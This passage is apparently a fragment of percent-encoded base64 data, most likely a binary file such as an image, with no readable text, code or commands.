9%34%6d%75%70%63%35%56%6e%77%41%44%77%41%4f%4f%4b%35%34%42%0a%74%78%79%63%6a%73%54%57%6c%72%38%4c%51%36%72%63%49%77%79%56%63%67%2f%69%53%61%7a%41%57%32%35%4e%66%71%65%46%39%32%6b%75%55%38%2b%70%4a%4e%32%42%51%78%44%41%73%53%50%51%39%4b%66%46%4f%38%62%4b%34%59%6b%71%51%51%63%39%4b%62%30%48%0a%31%70%41%63%44%43%6a%50%72%58%53%30%37%58%6b%51%34%70%72%51%39%73%38%45%65%4a%68%71%39%71%6c%71%37%6a%7a%6f%67%41%70%7a%7a%69%75%34%74%62%39%5a%63%32%38%6f%2b%63%48%41%50%72%58%7a%6e%34%64%31%46%37%44%56%49%70%49%33%4b%4c%6b%42%0a%73%47%76%65%6f%79%5a%62%53%31%76%49%53%43%68%41%4c%4d%4b%35%4d%58%67%59%34%69%46%30%6a%6a%39%74%4f%6e%4c%52%6d%33%4e%41%54%48%74%42%47%61%6f%54%52%45%4c%74%49%35%72%58%68%6a%57%35%74%66%74%4b%4e%6b%41%41%47%71%55%30%62%48%4a%49%0a%36%31%38%46%6a%73%48%4c%44%79%50%6f%38%44%58%39%70%48%55%7a%48%42%56%4e%67%48%66%4f%65%39%64%44%6f%57%70%6c%47%57%33%6c%59%59%37%45%6e%6d%73%53%52%44%6b%31%43%72%75%6a%68%6c%4a%33%4b%63%2f%68%57%32%42%78%6a%70%79%57%70%72%58%70%0a%4b%61%5a%36%55%6a%42%75%2f%77%42%4b%65%43%61%77%74%45%31%4d%58%61%42%57%50%7a%71%4d%47%74%30%63%69%76%75%4d%4a%58%39%72%42%4d%38%57%70%42%78%64%67%79%63%30%37%4e%4e%37%30%74%64%64%69%62%43%35%6f%42%79%4b%54%74%53%6a%70%51%49%57%0a%69%69%69%67%41%6f%6f%6f%6f%41%4b%4b%4b%4b%41%43%69%69%69%67%41%6f%6f%6f%6f%41%62%53%6d%6a%74%52%55%39%51%51%30%31%56%76%5a%50%4b%74%32%59%64%68%56%6f%39%44%57%54%72%63%2f%6c%57%6e%4a%36%6e%41%2b%74%63%6d%4f%6e%79%55%37%6c%30%31%0a%65%53%52%78%39%37%4f%5a%5a%58%42%34%79%61%70%4b%43%70%50%65%72%45%35%33%53%5a%49%78%6b%31%48%67%5a%78%58%77%64%65%70%7a%56%47%7a%33%61%53%74%46%41%71%46%79%44%57%67%41%49%6f%77%41%42%6b%31%42%45%6e%49%4f%4f%4b%74%42%64%35%41%49%0a%72%69%71%54%4e%33%73%45%4d%59%7a%6b%39%54%7a%56%6b%4b%51%63%39%68%54%55%41%42%79%54%67%41%59%71%6c%71%65%73%57%6d%6b%32%72%50%64%7a%72%47%4f%32%4f%54%2b%56%47%48%77%38%71%7a%30%52%68%4b%61%52%6f%67%68%52%6b%6e%49%70%79%45%4e%79%0a%43%4d%64%78%58%41%74%38%54%39%4c%53%54%59%6a%6c%30%7a%67%6b%72%58%53%61%4e%34%6c%30%33%56%34%77%31%72%4d%43%33%63%45%59%50%35%56%31%56%63%71%72%52%6a%64%6f%77%64%61%50%51%36%45%41%56%4b%4d%41%59%34%71%76%47%53%34%79%42%2b%66%46%0a%53%67%6b%38%31%34%31%57%6e%4b%6d%37%4e%45%74%33%31%4a%56%70%31%4d%42%42%47%4d%38%30%2f%42%72%4f%4b%75%79%51%48%57%6c%41%39%68%51%41%51%63%6e%70%54%73%69%74%47%72%45%74%69%45%55%59%4e%4f%34%7a%78%52%6a%33%6f%35%57%78%58%45%49%34%0a%70%75%4b%6b%50%53%6d%38%55%6c%64%44%54%49%6d%47%4b%68%6b%54%63%70%55%6a%49%49%77%61%73%4d%4d%6a%69%6f%7a%77%4d%59%36%6d%75%6a%44%53%53%71%4a%73%6d%54%75%6d%65%42%2f%45%58%77%36%39%74%71%30%74%7a%45%4d%6f%78%4a%4f%42%58%42%46%43%0a%79%6b%6f%50%6c%48%55%47%76%6f%62%78%50%59%4a%50%4b%30%4d%6f%42%56%2b%68%4e%65%66%70%38%50%58%6d%31%32%4a%59%53%54%62%4d%52%75%35%72%39%50%79%37%33%36%4b%61%5a%35%4d%70%71%4d%37%4d%38%79%59%71%77%4a%55%48%41%36%67%2b%74%4c%6b%45%0a%66%4d%70%56%75%31%65%37%65%4b%66%68%42%61%52%61%4d%30%39%69%35%45%69%70%75%49%41%50%59%5a%4e%65%47%4f%68%69%6c%6b%56%6a%75%5a%57%49%47%52%6a%4e%64%31%32%39%47%61%38%30%65%34%52%6b%6f%79%75%54%30%49%36%56%39%43%2b%45%5a%57%75%76%0a%43%63%4a%50%51%41%64%61%38%43%30%36%78%6c%31%47%39%69%74%34%6b%4c%4d%78%42%49%48%51%66%6a%58%30%4a%6f%74%6f%64%4c%30%43%43%32%50%47%41%4e%32%44%6e%46%64%46%47%44%5a%35%2b%4d%6d%6b%74%44%70%50%44%6a%67%76%4a%45%65%68%48%54%74%55%0a%39%37%62%43%4f%51%6a%31%7a%57%66%34%62%63%50%71%44%59%4f%52%32%72%70%64%51%67%44%49%57%41%35%46%66%50%5a%2f%67%65%61%4e%30%64%75%57%56%6e%62%55%35%61%53%44%35%53%61%70%53%51%35%47%41%53%4d%63%38%56%73%79%4a%6c%57%41%71%6a%4c%47%0a%63%63%44%36%31%38%45%2f%33%63%72%4d%2b%6d%70%79%54%52%56%74%4c%78%72%4f%35%45%71%5a%77%76%55%44%76%58%62%61%5a%71%61%58%71%41%67%6a%4f%4f%6c%63%4f%36%42%44%67%44%49%50%57%6e%57%64%7a%4e%59%33%41%4d%5a%79%75%63%6e%6d%76%6f%63%75%0a%7a%48%32%62%55%57%7a%6c%78%4f%47%35%6c%7a%49%39%48%42%7a%6e%50%57%6e%59%47%4f%74%5a%75%6d%36%69%6c%39%43%43%47%79%77%36%38%56%6f%34%39%36%2b%76%6f%56%6f%31%56%7a%4a%6e%6b%53%54%69%37%4d%4d%44%74%54%67%4b%61%4f%4d%69%6e%41%31%74%0a%66%55%68%4d%57%69%69%69%6d%4d%4b%4b%4b%4b%41%43%69%69%69%67%41%6f%6f%6f%6f%41%4b%4b%4b%4b%41%45%6f%48%57%67%38%55%67%37%30%75%6f%4a%43%45%38%47%75%66%38%41%45%62%5a%67%51%5a%37%31%76%39%42%39%61%35%62%78%42%4b%57%6d%45%58%48%41%0a%79%50%65%76%4a%7a%53%64%71%62%4e%38%4f%72%7a%52%7a%7a%6e%71%63%5a%77%61%61%6f%33%47%6c%4a%4f%43%70%41%35%4f%61%64%45%4d%47%76%68%36%6a%54%6b%32%65%36%72%63%75%68%61%69%54%43%67%56%5a%52%50%6d%46%52%4a%6b%4b%4d%43%72%43%45%5a%79%0a%4f%6f%46%63%73%59%75%63%37%45%56%4a%38%73%62%6d%62%72%2b%72%78%61%4e%70%6b%6c%78%4e%30%41%4f%50%72%58%67%48%69%4c%78%48%64%36%78%64%76%4b%38%6a%42%51%54%73%58%50%47%4d%31%36%52%38%56%74%52%4b%57%73%63%41%4f%51%77%35%48%62%36%31%0a%34%32%77%4a%48%58%4a%42%34%7a%58%33%47%55%59%4b%4d%49%33%61%31%50%4a%72%56%6d%33%6f%77%42%44%74%75%55%6e%70%7a%7a%33%71%2f%70%75%73%33%75%6b%33%53%7a%32%73%72%42%31%50%54%50%42%48%65%71%47%4d%48%41%34%39%63%55%6a%45%6c%53%41%42%0a%6e%49%35%72%32%6e%54%6a%4a%4e%4e%48%49%35%75%2b%68%39%48%65%43%76%45%36%36%2f%70%45%62%53%53%44%7a%34%79%53%34%42%35%78%30%72%72%45%4f%55%42%41%78%6b%56%38%2b%2f%44%54%55%78%5a%61%33%4e%45%57%77%73%71%68%51%43%65%42%67%35%79%4b%0a%39%35%74%4a%79%38%51%41%4f%54%37%39%71%2b%51%7a%6e%4c%74%48%4f%4b%30%4f%69%6a%69%4e%65%56%6c%36%50%48%65%70%52%56%64%47%2f%4d%64%61%6c%55%35%4e%66%48%79%58%4c%4b%78%32%39%4c%6b%6d%4d%30%6f%46%41%4f%4b%63%6f%79%4b%75%4b%62%49%59%0a%41%55%70%42%78%51%42%31%6f%35%72%61%4d%53%62%69%59%34%70%70%47%42%6d%70%4d%55%33%47%65%74%54%4b%46%68%70%6a%63%6a%48%53%6f%33%42%5a%76%51%41%56%4b%65%4f%4d%43%6d%4d%4d%6a%30%48%74%57%57%71%61%61%47%72%50%63%78%64%5a%73%6b%75%37%0a%59%34%48%7a%6a%6f%61%35%6a%54%72%32%62%54%72%77%4a%50%7a%67%34%42%49%72%76%4d%41%6e%42%55%45%65%74%5a%75%6f%2b%48%6f%4c%39%44%4e%62%38%53%44%73%50%57%76%76%63%67%78%30%62%4b%45%6d%65%4e%6a%71%55%6b%2b%61%4b%4c%4e%78%72%49%75%39%0a%4d%6b%69%54%47%39%30%4b%67%6e%73%43%4d%47%76%4b%5a%76%68%66%48%50%66%62%76%4e%42%33%6e%63%32%4f%32%61%36%39%62%61%39%73%53%79%75%6a%45%44%6a%70%51%4c%71%56%4d%67%4b%79%73%52%6a%4a%72%37%56%55%6f%79%73%30%65%54%4b%76%55%57%68%53%0a%30%62%77%68%70%57%68%4b%4a%49%51%72%79%67%2f%4d%54%56%2b%37%75%77%51%56%68%47%55%50%33%76%61%6f%47%65%5a%74%71%62%54%6b%38%5a%48%55%2f%57%74%54%54%64%41%75%4a%37%6c%57%5a%43%73%52%36%67%6a%72%57%6e%75%77%52%6c%65%70%56%30%4e%54%0a%77%76%5a%4d%44%35%78%42%41%37%5a%72%71%4c%6b%42%6f%32%42%37%69%6d%57%6c%71%6b%45%51%52%51%51%41%4d%56%4a%4d%4d%6f%66%59%56%34%32%59%79%35%36%62%62%50%63%77%63%48%42%4a%4d%35%6d%51%45%53%4d%4f%32%61%69%61%50%67%38%56%61%6c%49%45%0a%6a%66%57%6f%69%4f%4b%2f%4c%73%59%2f%33%7a%73%66%51%55%5a%50%6c%4d%36%61%49%5a%50%46%55%58%54%61%54%73%42%4b%6e%71%61%31%33%54%4a%71%6e%4e%47%51%43%42%77%44%32%46%45%4a%32%61%61%5a%31%71%58%4d%72%4d%58%53%4e%54%4e%6a%4f%41%42%2b%0a%36%4a%77%78%39%36%37%61%31%75%55%6e%51%4f%72%5a%79%4f%6d%61%38%39%65%4d%72%77%4d%34%37%67%64%36%30%4e%48%31%4f%53%31%75%6c%6a%63%35%55%38%44%4e%66%54%35%62%6a%75%57%30%57%7a%67%78%57%48%36%6f%37%7a%48%55%2b%74%4b%42%55%45%55%75%0a%39%51%77%35%42%47%61%6d%42%50%55%34%78%58%31%74%4f%53%6c%46%4e%48%6b%74%4e%4f%77%2b%69%6b%6f%72%51%42%61%4b%53%67%63%30%41%4c%52%52%52%51%41%55%55%55%55%41%46%46%46%46%41%43%47%6b%48%51%30%67%70%52%31%70%64%51%57%77%30%6e%67%56%0a%79%57%75%67%2f%62%53%33%59%44%46%64%59%33%47%54%36%43%75%50%31%70%38%33%44%63%35%34%72%77%63%34%6c%2b%37%61%4f%72%44%4c%33%6a%46%59%35%63%6e%74%55%73%51%35%71%45%38%35%71%65%4c%74%58%78%55%32%37%73%39%71%4b%30%4c%69%63%44%4e%50%0a%42%4b%37%6a%37%56%48%47%4d%34%46%50%6b%4a%53%4e%7a%77%52%74%72%70%79%32%4b%6e%57%53%61%4f%50%47%79%35%61%62%5a%35%4e%38%54%6b%65%51%78%76%79%51%44%69%76%4d%35%45%47%4d%6b%34%35%46%65%78%2b%4b%39%4e%6e%31%50%53%53%4c%5a%43%38%78%0a%34%78%6a%4f%42%58%47%61%68%38%4f%74%5a%73%4e%4a%4e%38%59%57%4d%49%55%6c%78%6a%4a%72%39%47%70%51%56%4f%6d%72%49%38%4f%6e%56%55%32%30%63%58%2f%47%61%54%4a%47%53%42%6b%35%41%70%7a%41%70%4b%79%6b%45%63%64%44%32%70%41%52%67%45%64%51%0a%61%30%6a%4e%50%64%47%31%6b%61%33%68%65%55%70%34%6b%73%55%48%42%4d%70%42%2f%4b%76%6f%65%77%75%53%6c%79%6d%65%6a%4b%4b%2b%66%66%43%74%73%5a%2f%45%64%6b%46%79%53%30%6d%43%52%32%72%33%69%53%4a%6b%6e%74%30%42%49%49%49%48%46%5a%59%79%0a%68%47%72%52%61%73%63%4d%36%6e%4c%55%56%6a%70%56%42%47%54%2f%41%48%75%6c%54%4a%77%51%44%55%43%74%38%77%42%37%41%56%4d%68%35%72%38%72%78%39%4c%32%64%64%70%48%75%55%32%35%51%54%4a%68%31%46%53%70%30%71%4a%54%7a%55%6b%64%59%30%32%72%0a%32%4b%6c%6f%50%55%5a%42%70%64%75%61%56%52%77%61%57%75%2b%46%4e%4e%47%54%59%6d%4b%62%67%56%4a%69%6d%6b%59%46%4b%64%4e%57%45%6d%79%49%6a%6d%6d%75%4d%6a%46%53%55%30%35%39%4b%35%5a%77%53%4c%69%33%65%35%58%50%41%4b%39%36%57%4b%63%78%0a%53%67%4b%75%31%54%31%70%7a%48%6e%70%55%54%5a%77%52%33%4e%56%67%73%58%4f%68%56%54%57%78%55%6f%52%6d%72%4d%31%57%67%68%75%59%78%6c%56%59%48%72%6d%71%7a%61%46%59%75%63%74%62%4b%54%39%54%56%57%32%75%6a%41%77%42%4a%78%57%72%62%33%61%0a%4f%4f%6f%2f%47%76%30%44%41%35%73%71%6b%56%64%6e%6e%31%73%46%47%39%30%69%47%48%52%37%4b%49%67%4c%41%6f%37%31%66%45%59%58%41%55%44%61%50%51%55%62%77%63%2f%4d%4b%50%4e%56%52%31%46%65%71%38%58%42%71%37%6b%5a%51%6f%71%47%79%48%44%50%0a%63%59%46%56%72%71%56%55%6a%59%41%38%34%70%74%78%65%72%48%33%46%59%31%7a%63%74%50%4a%6a%4a%41%39%71%38%54%4d%38%79%67%6f%4f%4b%5a%31%30%71%4c%76%63%69%62%4c%53%4d%66%65%6a%67%69%6c%55%63%45%55%59%77%61%2f%50%36%38%2b%61%62%61%50%0a%53%68%6f%72%44%43%6f%4e%56%35%59%7a%6e%70%56%74%68%78%55%52%42%49%72%4f%45%6d%6d%62%52%6c%71%5a%73%73%58%4a%37%56%57%61%4a%68%2b%38%44%41%45%48%69%74%4e%30%79%53%43%4b%67%65%49%59%49%72%74%70%59%68%77%6b%72%47%72%74%4a%57%5a%6f%0a%36%4c%72%4c%49%34%74%35%6a%6b%6b%35%42%50%70%58%56%49%34%59%42%6c%35%42%46%65%65%53%4b%59%38%4f%6f%35%42%37%56%31%4f%69%36%69%4a%59%6c%69%4a%2b%59%44%48%4e%66%5a%5a%58%6d%48%4d%6c%46%73%38%72%46%55%45%6e%64%47%2b%4b%4d%30%7a%72%0a%7a%6d%6e%41%35%34%72%36%4f%4d%6b%30%63%41%74%41%6f%6f%46%4d%42%61%4b%4b%4b%59%42%52%52%52%51%41%55%55%55%55%41%4d%46%4c%51%4f%6c%46%4c%7a%45%74%68%6b%68%2b%56%76%70%58%45%61%73%66%39%4b%63%48%72%32%72%74%35%42%38%70%2b%6c%63%4c%0a%71%78%7a%65%74%58%7a%32%63%75%30%54%74%77%69%39%34%7a%78%31%49%71%61%4f%6f%41%66%6d%4e%54%78%39%61%2b%4f%71%61%4d%39%71%4f%78%62%6a%78%6a%6b%34%34%71%7a%48%41%4a%62%4b%59%6b%6b%6e%61%51%4b%71%72%6b%6a%41%36%31%72%61%51%70%65%4f%0a%53%4a%68%6e%49%4e%64%2b%54%32%39%75%72%6e%6e%34%39%4f%55%47%6a%6b%64%48%6b%38%71%2f%45%62%34%34%66%42%42%72%72%39%66%31%47%30%67%38%50%58%62%33%44%49%49%52%47%51%55%49%48%50%46%63%70%71%39%6b%39%6c%71%50%6d%71%6e%4f%37%4f%63%56%0a%4c%64%77%78%61%78%70%7a%32%31%30%41%79%53%44%42%41%4e%66%70%73%61%61%6c%42%4e%48%79%6b%61%76%73%70%4e%4d%2b%63%39%52%6c%52%39%53%6d%6c%6a%43%2b%55%7a%45%6a%42%37%5a%4f%4b%71%72%30%4f%52%6a%50%53%76%54%74%57%2b%46%4c%47%34%4c%57%0a%5a%49%54%71%42%36%55%33%54%50%68%58%50%4a%4b%47%75%35%51%73%61%6b%5a%42%7a%36%31%69%71%62%35%72%57%4f%72%36%33%46%4b%39%79%44%34%57%36%4d%31%31%66%53%58%6a%6f%64%73%53%67%6f%53%4f%2b%65%66%30%72%31%6c%56%4d%2b%6f%70%67%5a%47%51%0a%61%71%61%5a%70%39%72%6f%6c%6f%62%57%31%43%67%67%59%4a%48%65%74%62%51%34%44%50%64%68%79%43%51%76%42%4e%61%56%6f%4b%4e%4e%6f%34%76%61%4b%72%55%56%6a%53%6e%6a%4d%52%79%52%6a%49%34%6f%6a%36%44%36%56%50%71%5a%41%6b%41%78%77%42%56%5a%0a%42%37%31%2b%55%5a%75%72%56%33%59%2b%71%77%36%2f%64%70%46%68%54%7a%6e%4e%53%6f%52%55%53%72%78%31%71%52%4d%44%76%58%6c%30%6e%64%68%49%6e%42%77%4d%47%6c%7a%78%54%46%66%48%41%35%70%78%63%59%36%34%72%31%36%54%56%6a%4b%31%78%63%34%70%0a%43%63%69%6f%32%6d%56%41%53%57%2f%57%71%73%6c%2b%69%67%2f%4d%4d%44%76%6d%68%32%5a%70%47%6e%4a%37%49%74%45%34%70%43%52%69%73%35%39%56%6a%58%50%7a%69%6f%44%71%36%45%38%4d%43%4b%35%70%77%76%73%62%4b%68%4e%39%44%54%63%6b%56%43%58%42%0a%72%50%66%56%55%37%6b%56%43%32%72%52%6e%6f%52%57%44%70%4e%39%44%57%4f%48%6b%74%30%61%54%59%4a%7a%33%70%75%57%58%37%72%45%56%6e%44%55%55%49%34%49%7a%39%61%63%4c%39%54%2f%41%42%44%38%36%30%70%2b%31%68%73%79%6e%68%6d%2b%68%70%43%35%0a%6c%55%59%33%6b%30%6e%32%69%59%6b%2f%4d%61%6f%4c%65%4b%54%6a%50%36%31%4d%74%77%75%4f%74%64%58%31%75%75%6c%61%35%4d%73%50%62%6f%54%4d%7a%50%38%41%65%59%30%4a%67%64%54%2b%6c%52%69%51%45%35%7a%54%39%2b%52%77%52%6d%75%4b%74%57%71%54%0a%33%4a%56%4f%33%51%6b%42%47%66%61%6c%4a%47%52%55%51%59%30%45%6e%50%4e%63%71%54%54%31%42%4c%55%6b%4a%42%48%46%4d%78%6d%6b%7a%52%6d%71%74%72%64%44%32%49%33%41%77%61%68%59%41%35%71%77%51%43%65%65%6c%4d%5a%42%32%71%34%74%33%31%4e%49%0a%79%5a%55%64%4d%39%42%6b%2b%6c%46%72%4b%62%57%34%44%67%34%49%37%56%4d%79%45%44%49%71%4b%52%41%56%4f%4f%74%65%6a%67%38%51%36%63%74%47%4b%70%46%53%57%70%32%6c%72%4f%73%73%4b%73%44%6e%49%42%71%77%4d%64%61%35%7a%51%72%73%41%47%4a%6d%0a%35%39%44%58%52%4c%7a%7a%58%33%2b%42%78%43%71%78%52%34%74%61%44%68%4b%77%2b%67%55%6c%4b%76%53%76%51%4d%78%61%4b%4b%4b%59%42%52%52%52%51%41%55%55%55%55%41%4e%48%53%6a%74%69%6a%74%51%65%6c%4b%32%67%6c%73%4d%6c%50%79%48%36%56%77%57%0a%71%73%66%74%54%6e%30%4f%4b%37%79%58%2f%56%74%39%44%58%41%61%6d%63%33%45%6e%2b%38%61%2b%63%7a%70%2b%36%64%75%45%2b%49%70%71%4d%6b%47%70%34%2b%54%7a%55%4b%64%52%55%38%59%77%61%2b%51%71%72%55%39%75%4f%78%61%51%63%5a%42%35%72%53%30%0a%71%58%5a%64%44%63%63%43%73%32%4d%38%56%5a%69%63%49%79%74%6e%76%57%75%41%71%63%6c%56%4d%35%73%52%46%53%69%30%61%2b%71%36%57%6d%6f%51%4e%38%76%4a%47%41%52%31%72%69%37%69%77%75%64%50%66%61%45%49%55%48%67%39%36%39%45%74%5a%68%4c%43%0a%75%43%4f%6c%45%39%6c%44%63%4c%68%30%42%2f%43%76%30%33%41%34%74%53%70%71%35%38%6e%69%38%47%35%53%62%52%35%79%6c%2f%4d%42%6a%66%38%41%58%4e%4b%39%36%38%69%34%33%4c%39%42%33%72%72%5a%2f%43%74%72%49%53%56%47%4d%6d%6f%34%2f%43%4e%71%0a%6e%4f%34%37%71%37%6c%56%6a%65%35%35%2f%77%42%55%6e%31%4f%56%74%59%70%62%36%34%43%49%72%63%6e%6b%69%75%2b%30%79%77%57%7a%74%31%58%48%7a%59%79%61%66%59%36%56%62%32%51%2b%52%42%6e%31%78%56%71%55%68%41%57%48%70%58%48%6a%63%51%6c%42%0a%32%50%52%77%6d%46%55%57%6d%39%7a%44%31%4a%38%7a%6c%51%41%54%55%4b%6e%47%4f%61%61%37%6d%57%34%64%6a%7a%67%30%71%6b%48%4e%66%6c%6d%59%31%46%4f%73%30%66%53%55%6c%61%4e%69%63%50%78%6a%76%53%37%38%44%6b%6d%71%7a%4f%45%42%4f%63%41%56%0a%52%75%74%51%57%4d%45%62%2b%61%34%61%56%4c%57%35%63%61%4c%6b%7a%54%65%39%53%49%45%6c%68%2b%4e%5a%31%31%72%53%49%43%46%49%4a%48%76%57%44%64%33%37%53%74%68%57%4a%34%39%61%71%68%6d%48%4c%63%31%36%45%59%74%49%37%61%65%43%54%31%4e%53%0a%62%56%48%6c%42%77%78%2f%4f%71%6a%33%63%70%42%42%4f%51%66%65%71%70%6d%56%4f%67%35%70%46%4c%53%4d%4d%44%69%72%55%62%6e%5a%48%44%52%69%74%55%54%6d%55%45%48%63%54%2b%46%52%4e%63%41%66%63%7a%56%69%4b%7a%61%51%67%59%36%31%61%62%53%64%0a%71%62%6a%57%38%61%53%74%63%54%6e%43%4c%73%5a%5a%6c%64%68%6b%67%69%6b%77%35%37%6d%72%68%6a%56%51%56%79%4f%4b%6a%34%46%5a%53%53%54%4e%6f%75%4c%57%78%58%49%6c%48%52%6a%54%44%4c%4d%67%4f%53%65%4b%73%74%49%4f%51%4f%74%52%45%68%67%63%0a%31%53%73%78%78%55%57%37%57%49%55%76%35%46%59%68%6a%6a%6d%72%73%65%6f%6b%72%6a%64%2b%74%5a%30%6b%61%45%6e%31%71%75%77%4b%48%67%31%54%70%70%6d%72%6f%4b%53%4f%69%6a%31%4c%42%77%57%2f%57%72%63%65%70%49%63%44%64%2b%74%63%6b%73%78%7a%0a%67%6b%31%4f%4a%63%4c%6b%45%35%72%4a%34%5a%4d%79%6c%68%45%7a%72%30%76%51%52%6b%4d%4d%66%57%6e%69%37%55%6a%68%67%61%34%31%62%32%56%44%6a%4a%78%55%34%31%46%67%42%67%6e%38%36%79%65%44%4d%4a%59%4c%71%64%67%73%79%6b%34%42%36%31%4d%70%0a%42%36%47%75%54%74%4e%54%5a%70%67%43%61%36%53%32%6c%33%6a%4e%63%39%57%6a%79%48%48%56%6f%63%68%59%49%4f%44%69%6b%77%61%66%31%42%70%70%49%46%63%71%64%35%48%4d%74%45%4d%62%67%5a%71%42%68%74%4a%62%72%37%56%5a%4a%7a%55%4d%6f%41%57%74%0a%49%58%55%74%43%34%36%6b%4d%4d%70%67%75%6c%6b%51%34%79%65%66%53%75%31%74%4a%52%4e%41%72%41%67%35%48%4e%63%4d%51%41%41%4f%35%4e%64%64%6f%2b%52%5a%67%45%38%34%72%37%48%4a%4b%72%74%5a%6e%6e%34%79%46%6d%61%66%61%68%61%41%63%69%68%65%0a%68%72%36%32%4c%75%72%6e%6e%50%63%64%52%52%52%54%47%46%46%46%46%41%42%52%52%52%51%41%77%2f%64%6f%39%4b%43%4d%6a%46%47%4f%4b%54%42%62%44%4a%76%39%57%33%30%72%7a%2f%55%7a%6d%35%6b%48%2b%31%58%66%54%6b%65%55%33%30%72%7a%2f%55%54%6d%0a%36%6b%78%2f%65%72%35%72%4f%33%70%59%37%73%48%75%56%68%78%69%72%43%48%6d%6f%43%4f%67%48%57%70%34%77%51%61%2b%52%71%50%55%39%71%47%78%61%6a%55%45%67%47%72%49%47%38%45%45%59%78%30%71%75%76%54%41%36%31%5a%48%4b%34%36%56%67%70%63%73%0a%72%6d%4d%31%63%75%61%64%65%65%54%49%55%63%6b%4c%6e%72%58%51%52%53%71%36%5a%55%67%67%39%36%35%4e%6c%79%75%42%78%6a%76%55%39%76%66%79%32%78%43%38%6c%42%31%4e%66%54%5a%62%6d%71%70%70%4a%73%38%32%74%51%35%6e%6f%64%53%47%42%47%4d%55%0a%75%33%4e%5a%4d%65%72%6f%65%70%41%71%58%2b%31%59%4d%63%50%6b%2b%6d%4b%2b%6b%6a%6d%64%46%78%76%63%34%35%55%48%66%59%76%5a%77%50%51%43%73%76%55%4c%74%65%55%55%39%71%69%75%4e%55%79%43%49%7a%6e%4e%5a%6b%6a%73%35%4c%4e%31%7a%36%31%34%0a%4f%5a%5a%74%46%78%63%59%73%36%61%47%48%61%64%77%48%47%57%39%61%61%38%6f%58%6b%6e%46%4e%6b%6c%56%49%2b%54%57%48%66%36%67%46%55%37%57%35%72%35%68%30%33%56%6c%7a%48%72%59%65%67%35%61%45%2b%6f%61%6c%67%46%56%4f%44%57%42%4c%63%79%53%0a%6b%6a%64%78%39%61%67%6b%75%47%6c%59%6b%6e%4f%61%61%70%42%55%67%44%6d%75%32%6e%52%35%55%65%78%53%77%76%4b%69%32%67%43%41%46%69%44%78%6e%4e%4d%61%64%6d%66%43%6a%35%66%57%71%6f%4c%76%38%6f%36%56%63%68%58%41%32%6b%5a%39%36%30%6b%6b%0a%6b%61%75%50%4b%50%53%49%41%35%66%6e%4e%57%6b%43%41%5a%78%38%76%66%48%57%6f%4e%2b%7a%67%6a%4e%49%5a%47%49%4a%58%6a%32%72%4a%4e%6d%63%6f%75%52%6f%43%39%45%53%37%55%47%44%36%6d%6f%7a%66%54%74%6b%45%35%7a%37%31%52%33%48%71%54%6d%6d%0a%6d%58%48%54%69%74%4f%64%32%73%5a%4c%44%33%64%79%79%38%68%4a%4a%50%57%6f%74%2b%65%39%52%65%59%54%33%70%4d%34%48%57%70%63%62%6d%38%61%61%53%4a%4d%34%35%6f%4c%6b%43%6f%74%35%36%43%6a%63%53%44%67%55%6c%46%70%6c%4b%4e%6d%49%7a%5a%4a%0a%7a%55%54%6b%55%72%45%35%35%71%4e%6d%46%62%52%56%6a%61%4b%73%52%73%6f%47%53%4b%59%48%50%54%6d%70%4d%63%56%45%2f%42%4a%50%53%74%49%6c%70%58%4a%64%77%4b%34%46%51%73%53%72%42%68%30%41%70%6f%66%42%77%54%53%35%55%67%68%6a%31%50%46%58%0a%59%30%35%64%43%61%31%63%6b%6c%73%6b%56%31%32%6b%53%6c%6f%68%6b%6b%2f%57%75%4e%54%39%32%70%41%37%39%4b%36%33%52%46%49%68%42%50%63%43%75%4c%46%52%30%50%4c%78%30%55%6b%62%34%36%41%30%43%6c%58%37%67%70%41%51%4d%31%34%62%56%6d%65%4a%0a%59%6a%4a%77%54%55%55%6a%5a%57%70%57%41%49%4e%52%50%67%44%6d%74%6f%4d%71%43%4b%7a%39%76%72%58%59%36%53%4d%57%53%66%53%75%4e%6b%49%78%6a%75%44%6b%31%32%6d%6d%44%46%6e%47%50%39%6b%47%76%72%63%69%64%32%63%57%4f%33%4c%6f%70%56%36%47%0a%6b%78%6d%6e%44%76%58%32%4e%6a%7a%48%75%4c%52%52%52%54%41%4b%4b%4b%4b%41%43%69%69%69%67%42%67%70%65%31%41%36%47%67%6a%50%46%4a%73%46%73%51%58%50%45%4c%66%51%31%77%46%38%4d%33%54%6e%33%72%76%72%72%6d%42%68%37%56%77%56%32%4d%33%4c%0a%6a%30%4e%66%4c%5a%34%39%54%76%77%65%35%41%42%79%4b%6e%54%71%4b%69%41%47%63%2b%6c%54%52%6a%4a%72%35%4b%6f%39%54%32%49%36%49%73%78%39%52%56%6c%42%78%56%65%4d%63%69%72%43%6e%69%73%4a%61%6f%7a%6b%4c%6e%48%46%47%41%65%6f%70%77%77%51%0a%65%4f%63%30%67%47%61%7a%6a%4b%55%57%59%75%33%55%6a%57%4a%63%6e%72%54%67%71%71%63%67%45%6b%55%75%44%7a%53%45%34%35%4a%72%56%56%36%6d%79%59%75%53%4e%77%4a%48%55%67%31%58%6d%6d%43%71%65%63%55%73%31%79%45%55%35%49%72%42%31%44%55%77%0a%4d%67%45%45%34%72%65%6e%52%63%33%64%6e%58%51%6f%4f%54%30%51%61%68%71%4f%41%56%56%71%35%32%57%64%33%4a%79%63%35%4e%4a%4e%4d%30%72%6b%6b%6e%72%55%58%66%71%61%39%53%6a%52%55%55%65%35%68%36%43%69%74%55%54%4b%66%6c%7a%55%67%35%49%78%0a%55%41%4a%48%41%35%71%78%41%70%7a%6b%31%70%4c%51%36%4a%61%45%36%4a%67%35%71%77%76%41%79%4b%69%78%78%54%74%2b%42%6a%69%75%61%54%75%39%44%6d%6b%37%6a%79%51%52%54%53%77%41%78%54%4e%31%4a%67%6b%35%46%53%68%4a%43%6c%36%6a%4a%79%65%74%0a%4f%77%43%4f%53%63%30%33%59%63%35%79%61%30%73%72%61%46%72%51%56%51%52%33%6f%4a%4e%4b%52%67%59%79%61%55%73%4d%55%49%46%64%6a%65%6d%61%46%50%57%6d%6c%71%61%48%78%36%56%61%58%63%72%6c%59%70%63%41%6b%47%6f%79%51%65%31%44%6e%4c%41%2b%0a%31%48%41%48%46%55%6b%55%6b%78%6d%53%4d%31%45%35%79%43%4b%65%37%67%63%44%46%56%35%47%78%6b%6b%31%70%46%57%4e%6f%49%59%37%59%47%52%36%31%59%6a%54%64%45%43%65%76%57%71%51%62%65%32%7a%74%6e%72%33%71%2f%45%2b%49%39%70%37%63%43%72%61%0a%30%48%50%52%61%41%6f%4c%79%42%52%58%5a%36%53%68%57%41%66%51%56%79%56%67%6e%6d%58%4f%52%79%63%31%32%74%6a%45%45%69%41%47%65%6c%65%62%69%35%57%56%6a%78%73%64%4f%36%73%61%